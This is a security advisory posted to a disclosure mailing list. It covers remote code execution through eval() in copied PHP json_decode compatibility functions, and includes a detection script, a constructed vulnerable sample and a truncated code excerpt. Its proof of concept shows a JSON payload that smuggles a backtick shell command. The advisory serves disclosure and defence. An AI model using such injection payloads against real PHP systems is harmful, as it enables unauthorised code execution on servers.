Open Source and information security mailing list archives
Date: Wed, 29 Jun 2022 18:02:05 +1000
From: Eldar Marcussen <>
Subject: [FD] JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function

JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function
Several PHP compatibility libraries contain a potential remote code execution
flaw in their `json_decode()` function, inherited by copy-pasting existing
vulnerable code.

 * JAHx221 -

Affected components
 * WassUp Realtime analytics wordpress plugin/compat library -
 * AjaXplorer Core -
 * FlexoCMS -
 * Various code -
 * compat_functions.php -

This appears to date back to a compatibility library published in 2010 and
appears in several code bases, with no or only minor variations.

The vulnerable code generally shares the following characteristics:
 * The json_decode function is declared only if it does not already exist
 * a series of str_replace() calls transforms the JSON representation into PHP source
 * eval($out)

Since `eval()` is Turing complete, it is generally considered unsafe to use
on user-controlled or user-influenced data. However, it is unclear whether
exploitation would be possible in practice, because a native json_decode
function is likely to be present, in which case the polyfill is never declared.
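A scanner for the pattern just described, added here as an example and not part of the advisory or of any of the affected projects: it blanks PHP string literals and comments, finds every user-defined json_decode() and reports whether the body reaches str_replace() and eval(). The PHP at the bottom is a constructed sample that mirrors that shape; it is not the real compat_functions.php.

```python
import re

# One pass that blanks PHP string literals and comments (newlines kept), so the
# '{"' and '"}' literals these polyfills juggle cannot upset brace matching.
_NOISE_RE = re.compile(
    r"""'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|//[^\n]*|#[^\n]*|/\*.*?\*/""", re.DOTALL)
_DEF_RE = re.compile(r"\bfunction\s+json_decode\s*\(", re.IGNORECASE)

def _strip_noise(src: str) -> str:
    return _NOISE_RE.sub(lambda m: ('""' if m.group(0)[0] in "'\"" else "")
                         + "\n" * m.group(0).count("\n"), src)

def _function_body(clean: str, start: int) -> str:
    """Brace-matched body of the function whose 'function' keyword is at `start`."""
    open_idx = clean.find("{", start)
    if open_idx == -1:
        return ""
    depth = 0
    for i in range(open_idx, len(clean)):
        depth += {"{": 1, "}": -1}.get(clean[i], 0)
        if depth == 0:
            return clean[open_idx:i + 1]
    return clean[open_idx:]  # unterminated function: scan what is there

def find_json_decode_polyfills(src: str) -> list[dict]:
    """Every user-defined json_decode() in `src`, with the traits the advisory lists."""
    clean = _strip_noise(src)
    guarded = re.search(r"function_exists\s*\(\s*['\"]json_decode['\"]", src) is not None
    findings = []
    for m in _DEF_RE.finditer(clean):
        body = _function_body(clean, m.start())
        findings.append({
            "line": clean.count("\n", 0, m.start()) + 1,
            "guarded": guarded,  # only declared when the native function is absent
            "str_replace": bool(re.search(r"\bstr_replace\s*\(", body)),
            "eval": bool(re.search(r"\beval\s*\(", body)),  # the code-execution sink
        })
    return findings

# Constructed sample shaped like the polyfill described above (not the real file).
SAMPLE_PHP = r'''<?php
if (!function_exists('json_decode')) {
function json_decode($json,$to_array=false) {
if (!empty($json) && strpos($json,'{"')!==false) {
$out = str_replace(array('{"','"}'), array('array("','")'), $json);
eval("\$x = $out;"); // runs whatever the rewrite produced
return $x;
}
} //end function json_decode
}
'''
```

Run find_json_decode_polyfills() over each .php file in a tree; any finding with "eval" set is a copy of the vulnerable polyfill worth removing.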

/**
 * compat_functions.php
 * Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for
 *   backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively
 * @author: Helene D. <>
 * @version: 0.3 - 2010-09-13
 * @since Wassup 1.8
 */

/**
 * Convert simple JSON data into a PHP object (default) or associative
 *   array. Emulates 'json_decode' function from PHP 5.2+
 * @author: Helene Duncker <>
 * @param string,boolean
 * @return (array or object)
 */
if (!function_exists('json_decode')) {
    function json_decode($json,$to_array=false) {
        if (!empty($json) && strpos($json,'{"')!==false) {
            $out = // str_replace() rewrite of $json (truncated in the post); the result is passed to eval()
            if (!$to_array) $x = (object) $x;
            return $x;
        }
    } //end function json_decode
}

Proof of Concept
The eval can be exploited in a number of ways, via either full or partial
control of the JSON string:
/* Payload */
or with partially controlled content:
/* Payload */
{"key":"value");echo `id`;//"}
json_decode('{"key":"value");echo `id`;//"}');

Solution
Ensure json_decode is present as a native function for your PHP.

Eldar "Wireghoul" Marcussen

Sent through the Full Disclosure mailing list